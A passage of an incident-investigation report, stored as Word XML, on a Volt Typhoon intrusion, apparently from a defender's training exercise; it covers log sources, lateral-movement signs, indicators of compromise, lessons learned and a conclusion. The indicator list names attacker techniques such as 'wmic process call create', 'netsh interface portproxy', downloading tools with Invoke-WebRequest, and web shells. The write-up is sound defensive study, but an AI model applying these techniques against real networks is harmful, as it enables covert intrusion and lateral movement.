      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Service activity, system changes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Application Log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Application-specific behavior</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">📂 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Other Important Logs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>PowerShell logs (command execution)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>WMI activity logs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>ADSelfService Plus logs (for initial compromise)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>File system activity (web directories, temp folders)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>5. Remote Access &amp; Lateral Movement Indicators</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Key indicators of attacker movement:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Use of:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>WMIC remote execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Admin shares (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>\\server\c$</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>RDP connections</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Suspicious behaviors:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Commands executed on multiple systems</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>File transfers between servers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Creation of new processes remotely</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6. Indicators of Compromise (IOCs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Suspicious files:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Renamed archives (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>.7z</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>.gif</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Web shells (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>.aspx</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>.jspx</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>wmic process call create</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>netsh interface portproxy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>Invoke-WebRequest</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (downloading tools)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Registry activity:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Queries for credential-related software</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>VM detection checks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>7. Key Challenges Faced</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Lack of familiarity with system tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Difficulty identifying normal vs abnormal behavior</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Limited understanding of log sources</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Attackers blending in using legitimate tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>8. Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">🔍 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>System Knowledge is Critical</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Understanding Windows internals is essential for investigation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">📊 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Logs are the Primary Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Knowing where to look saves time and improves accuracy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">🛠 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Attackers Use Legitimate Tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Detection must focus on behavior, not just tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">🔐 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Credential Security is a Major Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Compromised credentials enable full system access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">🌐 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Lateral Movement is a Key Stage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Monitoring internal traffic is just as important as external threats</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>10. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The Volt Typhoon attack demonstrates how advanced adversaries can operate stealthily within a network by leveraging built-in system tools. This investigation highlights the importance of strong system knowledge, effective logging, and proactive monitoring. By improving visibility and understanding attacker behavior, organizations can significantly enhance their ability to detect and respond to such threats.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>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7</Pages>
  <Words>1136</Words>
  <Characters>6259</Characters>
  <CharactersWithSpaces>7141</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2026-04-28T21:49:51Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-28T23:44:01Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>